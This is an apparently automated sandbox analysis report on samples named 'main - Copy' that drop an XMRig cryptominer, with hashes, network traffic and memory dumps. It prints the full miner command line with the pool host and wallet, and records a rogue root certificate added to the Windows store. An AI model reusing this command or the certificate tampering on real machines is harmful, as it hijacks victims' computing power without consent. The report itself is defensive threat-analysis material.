| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| Hash | Value |
| --- | --- |
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
Analysis: behavioral18
Detonation Overview
Submitted
2024-06-13 23:22
Reported
2024-06-14 14:26
Platform
win10v2004-20240611-en
Max time kernel
1792s
Max time network
1803s
Command Line
Signatures
XMRig Miner payload
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 5084 wrote to memory of 1452 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 5084 wrote to memory of 1452 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy - Copy.exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy - Copy.exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 13.107.22.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 20.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.22.107.13.in-addr.arpa | udp |
| NL | 23.62.61.97:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.109.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.109.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 95.179.241.203:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 203.241.179.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 32.251.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 105.83.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 30.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.204.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.173.189.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
Analysis: behavioral19
Detonation Overview
Submitted
2024-06-13 23:22
Reported
2024-06-14 14:28
Platform
win10v2004-20240611-en
Max time kernel
1792s
Max time network
1803s
Command Line
Signatures
XMRig Miner payload
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\main - Copy.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = (certificate blob omitted) | C:\Users\Admin\AppData\Local\Temp\main - Copy.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = (certificate blob omitted) | C:\Users\Admin\AppData\Local\Temp\main - Copy.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 5108 wrote to memory of 2192 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 5108 wrote to memory of 2192 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy.exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy.exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 13.107.22.237:443 | g.bing.com | tcp |
| NL | 23.62.61.72:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 34.56.20.217.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.22.107.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 72.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.111.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 45.76.89.70:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 133.111.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 70.89.76.45.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 32.251.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 105.83.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 90.65.42.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
Analysis: behavioral20
Detonation Overview
Submitted
2024-06-13 23:22
Reported
2024-06-14 14:29
Platform
win10v2004-20240508-en
Max time kernel
1790s
Max time network
1801s
Command Line
Signatures
Processes
C:\Users\Admin\AppData\Local\Temp\main.exe
"C:\Users\Admin\AppData\Local\Temp\main.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=4356,i,5047420736443372512,9747851268033796534,262144 --variations-seed-version --mojo-platform-channel-handle=4428 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=3840,i,5047420736443372512,9747851268033796534,262144 --variations-seed-version --mojo-platform-channel-handle=4764 /prefetch:8
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
Files
Analysis: behavioral1
Detonation Overview
Submitted
2024-06-13 23:22
Reported
2024-06-14 13:13
Platform
win10v2004-20240508-en
Max time kernel
1791s
Max time network
1799s
Command Line
Signatures
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (10).exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (10).exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=4500,i,9746875443948590908,1444894342962555245,262144 --variations-seed-version --mojo-platform-channel-handle=4184 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=4344,i,9746875443948590908,1444894342962555245,262144 --variations-seed-version --mojo-platform-channel-handle=4360 /prefetch:8
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
Files
Analysis: behavioral3
Detonation Overview
Submitted
2024-06-13 23:22
Reported
2024-06-14 13:13
Platform
win10v2004-20240611-en
Max time kernel
1793s
Max time network
1787s
Command Line
Signatures
XMRig Miner payload
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\main - Copy (2).exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = (certificate blob omitted) | C:\Users\Admin\AppData\Local\Temp\main - Copy (2).exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = (certificate blob omitted) | C:\Users\Admin\AppData\Local\Temp\main - Copy (2).exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 964 wrote to memory of 4008 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (2).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 964 wrote to memory of 4008 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (2).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (2).exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (2).exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 13.107.21.237:443 | g.bing.com | tcp |
| NL | 23.62.61.99:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 133.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.21.107.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.144.22.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 99.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.109.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.109.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 45.76.89.70:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 70.89.76.45.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.126.166.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 24.139.73.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 83.210.23.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 152.141.79.40.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/4008-14-0x0000020F2A720000-0x0000020F2A740000-memory.dmp
memory/4008-15-0x0000020F2A770000-0x0000020F2A790000-memory.dmp
memory/4008-16-0x00007FF7E4F50000-0x00007FF7E5A53000-memory.dmp
memory/4008-18-0x0000020F2C060000-0x0000020F2C080000-memory.dmp
memory/4008-17-0x0000020F2A790000-0x0000020F2A7B0000-memory.dmp
memory/4008-19-0x00007FF7E4F50000-0x00007FF7E5A53000-memory.dmp
memory/4008-20-0x00007FF7E4F50000-0x00007FF7E5A53000-memory.dmp
memory/4008-23-0x0000020F2C060000-0x0000020F2C080000-memory.dmp
memory/4008-22-0x0000020F2A790000-0x0000020F2A7B0000-memory.dmp
memory/4008-21-0x00007FF7E4F50000-0x00007FF7E5A53000-memory.dmp
memory/4008-24-0x00007FF7E4F50000-0x00007FF7E5A53000-memory.dmp
memory/4008-25-0x00007FF7E4F50000-0x00007FF7E5A53000-memory.dmp
memory/4008-26-0x00007FF7E4F50000-0x00007FF7E5A53000-memory.dmp
memory/4008-27-0x00007FF7E4F50000-0x00007FF7E5A53000-memory.dmp
memory/4008-28-0x00007FF7E4F50000-0x00007FF7E5A53000-memory.dmp
memory/4008-29-0x00007FF7E4F50000-0x00007FF7E5A53000-memory.dmp
memory/4008-30-0x00007FF7E4F50000-0x00007FF7E5A53000-memory.dmp
memory/4008-31-0x00007FF7E4F50000-0x00007FF7E5A53000-memory.dmp
memory/4008-32-0x00007FF7E4F50000-0x00007FF7E5A53000-memory.dmp
memory/4008-33-0x00007FF7E4F50000-0x00007FF7E5A53000-memory.dmp
memory/4008-34-0x00007FF7E4F50000-0x00007FF7E5A53000-memory.dmp
memory/4008-35-0x00007FF7E4F50000-0x00007FF7E5A53000-memory.dmp
memory/4008-36-0x00007FF7E4F50000-0x00007FF7E5A53000-memory.dmp
memory/4008-37-0x00007FF7E4F50000-0x00007FF7E5A53000-memory.dmp
memory/4008-38-0x00007FF7E4F50000-0x00007FF7E5A53000-memory.dmp
memory/4008-39-0x00007FF7E4F50000-0x00007FF7E5A53000-memory.dmp
memory/4008-40-0x00007FF7E4F50000-0x00007FF7E5A53000-memory.dmp
memory/4008-41-0x00007FF7E4F50000-0x00007FF7E5A53000-memory.dmp
memory/4008-42-0x00007FF7E4F50000-0x00007FF7E5A53000-memory.dmp
memory/4008-43-0x00007FF7E4F50000-0x00007FF7E5A53000-memory.dmp
memory/4008-44-0x00007FF7E4F50000-0x00007FF7E5A53000-memory.dmp
memory/4008-45-0x00007FF7E4F50000-0x00007FF7E5A53000-memory.dmp
memory/4008-46-0x00007FF7E4F50000-0x00007FF7E5A53000-memory.dmp
memory/4008-47-0x00007FF7E4F50000-0x00007FF7E5A53000-memory.dmp
memory/4008-48-0x00007FF7E4F50000-0x00007FF7E5A53000-memory.dmp
memory/4008-49-0x00007FF7E4F50000-0x00007FF7E5A53000-memory.dmp
memory/4008-50-0x00007FF7E4F50000-0x00007FF7E5A53000-memory.dmp
memory/4008-51-0x00007FF7E4F50000-0x00007FF7E5A53000-memory.dmp
memory/4008-52-0x00007FF7E4F50000-0x00007FF7E5A53000-memory.dmp
memory/4008-53-0x00007FF7E4F50000-0x00007FF7E5A53000-memory.dmp
memory/4008-54-0x00007FF7E4F50000-0x00007FF7E5A53000-memory.dmp
memory/4008-55-0x00007FF7E4F50000-0x00007FF7E5A53000-memory.dmp
memory/4008-56-0x00007FF7E4F50000-0x00007FF7E5A53000-memory.dmp
memory/4008-57-0x00007FF7E4F50000-0x00007FF7E5A53000-memory.dmp
memory/4008-58-0x00007FF7E4F50000-0x00007FF7E5A53000-memory.dmp
memory/4008-59-0x00007FF7E4F50000-0x00007FF7E5A53000-memory.dmp
memory/4008-60-0x00007FF7E4F50000-0x00007FF7E5A53000-memory.dmp
memory/4008-61-0x00007FF7E4F50000-0x00007FF7E5A53000-memory.dmp
memory/4008-62-0x00007FF7E4F50000-0x00007FF7E5A53000-memory.dmp
memory/4008-63-0x00007FF7E4F50000-0x00007FF7E5A53000-memory.dmp
memory/4008-64-0x00007FF7E4F50000-0x00007FF7E5A53000-memory.dmp
memory/4008-65-0x00007FF7E4F50000-0x00007FF7E5A53000-memory.dmp
memory/4008-66-0x00007FF7E4F50000-0x00007FF7E5A53000-memory.dmp
memory/4008-67-0x00007FF7E4F50000-0x00007FF7E5A53000-memory.dmp
memory/4008-68-0x00007FF7E4F50000-0x00007FF7E5A53000-memory.dmp
memory/4008-69-0x00007FF7E4F50000-0x00007FF7E5A53000-memory.dmp
memory/4008-70-0x00007FF7E4F50000-0x00007FF7E5A53000-memory.dmp
memory/4008-71-0x00007FF7E4F50000-0x00007FF7E5A53000-memory.dmp
memory/4008-72-0x00007FF7E4F50000-0x00007FF7E5A53000-memory.dmp
memory/4008-73-0x00007FF7E4F50000-0x00007FF7E5A53000-memory.dmp
memory/4008-74-0x00007FF7E4F50000-0x00007FF7E5A53000-memory.dmp
memory/4008-75-0x00007FF7E4F50000-0x00007FF7E5A53000-memory.dmp
memory/4008-76-0x00007FF7E4F50000-0x00007FF7E5A53000-memory.dmp
memory/4008-77-0x00007FF7E4F50000-0x00007FF7E5A53000-memory.dmp
memory/4008-78-0x00007FF7E4F50000-0x00007FF7E5A53000-memory.dmp
memory/4008-79-0x00007FF7E4F50000-0x00007FF7E5A53000-memory.dmp
memory/4008-80-0x00007FF7E4F50000-0x00007FF7E5A53000-memory.dmp
memory/4008-81-0x00007FF7E4F50000-0x00007FF7E5A53000-memory.dmp
memory/4008-82-0x00007FF7E4F50000-0x00007FF7E5A53000-memory.dmp
Analysis: behavioral11
Detonation Overview
Submitted
2024-06-13 23:22
Reported
2024-06-14 13:42
Platform
win10v2004-20240611-en
Max time kernel
1792s
Max time network
1787s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\main - Copy (6).exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 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 | C:\Users\Admin\AppData\Local\Temp\main - Copy (6).exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 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 | C:\Users\Admin\AppData\Local\Temp\main - Copy (6).exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4272 wrote to memory of 2904 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (6).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 4272 wrote to memory of 2904 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (6).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (6).exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (6).exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 13.107.21.237:443 | g.bing.com | tcp |
| BE | 88.221.83.240:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 67.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.83.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.21.107.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 45.76.89.70:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 70.89.76.45.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 65.139.73.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 8.179.89.13.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/2904-14-0x000001EB5BDB0000-0x000001EB5BDD0000-memory.dmp
memory/2904-15-0x000001EB5D7B0000-0x000001EB5D7D0000-memory.dmp
memory/2904-16-0x00007FF7A6F80000-0x00007FF7A7A83000-memory.dmp
memory/2904-17-0x000001EB5D7D0000-0x000001EB5D7F0000-memory.dmp
memory/2904-18-0x000001EB5D7F0000-0x000001EB5D810000-memory.dmp
memory/2904-19-0x00007FF7A6F80000-0x00007FF7A7A83000-memory.dmp
memory/2904-20-0x00007FF7A6F80000-0x00007FF7A7A83000-memory.dmp
memory/2904-23-0x000001EB5D7F0000-0x000001EB5D810000-memory.dmp
memory/2904-22-0x000001EB5D7D0000-0x000001EB5D7F0000-memory.dmp
memory/2904-21-0x00007FF7A6F80000-0x00007FF7A7A83000-memory.dmp
memory/2904-24-0x00007FF7A6F80000-0x00007FF7A7A83000-memory.dmp
memory/2904-25-0x00007FF7A6F80000-0x00007FF7A7A83000-memory.dmp
memory/2904-26-0x00007FF7A6F80000-0x00007FF7A7A83000-memory.dmp
memory/2904-27-0x00007FF7A6F80000-0x00007FF7A7A83000-memory.dmp
memory/2904-28-0x00007FF7A6F80000-0x00007FF7A7A83000-memory.dmp
memory/2904-29-0x00007FF7A6F80000-0x00007FF7A7A83000-memory.dmp
memory/2904-30-0x00007FF7A6F80000-0x00007FF7A7A83000-memory.dmp
memory/2904-31-0x00007FF7A6F80000-0x00007FF7A7A83000-memory.dmp
memory/2904-32-0x00007FF7A6F80000-0x00007FF7A7A83000-memory.dmp
memory/2904-33-0x00007FF7A6F80000-0x00007FF7A7A83000-memory.dmp
memory/2904-34-0x00007FF7A6F80000-0x00007FF7A7A83000-memory.dmp
memory/2904-35-0x00007FF7A6F80000-0x00007FF7A7A83000-memory.dmp
memory/2904-36-0x00007FF7A6F80000-0x00007FF7A7A83000-memory.dmp
memory/2904-37-0x00007FF7A6F80000-0x00007FF7A7A83000-memory.dmp
memory/2904-38-0x00007FF7A6F80000-0x00007FF7A7A83000-memory.dmp
memory/2904-39-0x00007FF7A6F80000-0x00007FF7A7A83000-memory.dmp
memory/2904-40-0x00007FF7A6F80000-0x00007FF7A7A83000-memory.dmp
memory/2904-41-0x00007FF7A6F80000-0x00007FF7A7A83000-memory.dmp
memory/2904-42-0x00007FF7A6F80000-0x00007FF7A7A83000-memory.dmp
memory/2904-43-0x00007FF7A6F80000-0x00007FF7A7A83000-memory.dmp
memory/2904-44-0x00007FF7A6F80000-0x00007FF7A7A83000-memory.dmp
memory/2904-45-0x00007FF7A6F80000-0x00007FF7A7A83000-memory.dmp
memory/2904-46-0x00007FF7A6F80000-0x00007FF7A7A83000-memory.dmp
memory/2904-47-0x00007FF7A6F80000-0x00007FF7A7A83000-memory.dmp
